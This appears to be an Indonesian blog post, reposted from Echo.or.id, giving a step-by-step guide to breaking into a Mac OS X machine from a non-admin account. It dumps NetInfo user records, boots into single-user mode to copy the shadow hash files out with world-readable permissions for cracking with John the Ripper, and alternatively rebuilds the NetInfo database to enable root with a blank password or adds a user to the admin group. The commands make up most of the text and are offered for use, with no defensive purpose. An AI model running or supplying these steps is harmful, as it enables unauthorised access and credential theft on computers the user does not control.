Untuk meng-crackpassword langkah pertama adalah mendapatkan hash. Run terminal and type:
G4x:~ noadmin$ nidump passwd .
-- anda akan melihat admin username diikuti tanda : ********
ex: root:********:0:0::0:0:System Administrator:/var/root:/bin/sh
admin:********:503:503::0:0:agd:/Users/admin:/bin/bash
agd:********:503:503::0:0:agd:/Users/agd:/bin/bash
G4x:~ noadmin$ niutil -read . /users/admin --> untuk membaca profil dari admin dan akan
-- dihasilkan generateduid : F8EE9D97-4E66-11D9-AFFE-000A95C81955 --> make note about this
misalkan untuk melihat profil dari user agd:
G4x:~ noadmin$ niutil -read . /users/agd
name: agd
_writers_passwd: agd
_writers_tim_password: agd
_writers_picture: agd
shell: /bin/bash
_writers_hint: agd
home: /Users/agd
gid: 503
authentication_authority: ;ShadowHash;
_writers_realname: agd
picture: /Library/User Pictures/Animals/Dog.tif
passwd: ********
realname: agd
hint:
sharedDir: Public
_shadow_passwd:
uid: 503
generateduid: F8EE9D97-4E66-11D9-AFFE-000A95C81944
---------------------------------------------------
kemudian untuk meng-generate kedalam file text lakukan perintah berikut:
--------------------------------------------------
G4x:~ noadmin$ nireport / /users agd generateduid > crck.txt
reboot, masuk melalui single-user mode (hold Cmd+S). dan ketikan perintah ini:
mount -uaw
cp -R /var/db/shadow/hash /Users/hash
chmod -Rf 777 /Users/hash
reboot
perintah diatas untuk memindahkan file hash ke directory /Users/hash.
Setelah mendapatkan hash, download john the ripper di http://www.openwall.com/john/
Cara untuk menggunakan JTR tidak akan dibahas disini karena sudah banyak sekali
tutorial-tutorial yang bertebaran di inet tentang JTR ini.
-------------------------------------------------------------------------------------
Jika anda tetap tidak mendapatkan akses untuk melakukan perintah2 diatas, maka anda dapat sama sekali menghapus file database netinfo dan menggantinya dengan yang baru sehingga yang dapat masuk kedalam komputer hanya user yg anda ciptakan.
-------------------------------------------------------------------------------------
hanya dengan melakukan perintah ini:
-------------------------------------------------------------------------------------
reboot ke single user mode, secara default anda akan mempunyai akses root.
localhost:/ root# /sbin/mount -uw /
localhost:/ root# cd /var/db/netinfo
localhost:/var/db/netinfo root# mv local.nidb local.nidb.old --->tujuannya untuk menonaktifkan netinfo sebelumnya, dan mengganti dg yg baru
localhost:/var/db/netinfo root# /usr/libexec/create_nidb --->netinfo baru!
localhost:/var/db/netinfo root# nicl -raw local.nidb -create /users/root passwd "" -->enable root
sehingga anda bisa mengakses komputer dalam mode gui dengan account root (password blank) dan membuat
account baru (admin) sesuka anda
localhost:/var/db/netinfo root# exit
-------------------------------------------------------------------------------------
atau jika anda tidak ingin mereset keseluruhan database netinfo gunakan perintah ini pada single-user:
-------------------------------------------------------------------------------------
localhost:/ root# /sbin/fsck -y
localhost:/ root# /sbin/mount -wu
localhost:/ root# /sbin/SystemStarter
localhost:/ root# niuitil -appendprop / /groups/admin users USER
localhost:/ root# sudo reboot
Source: Echo.or.id
2 Komentar:
Serem Kwan ...
Anak RPL emang haruz keren ...
Posting Komentar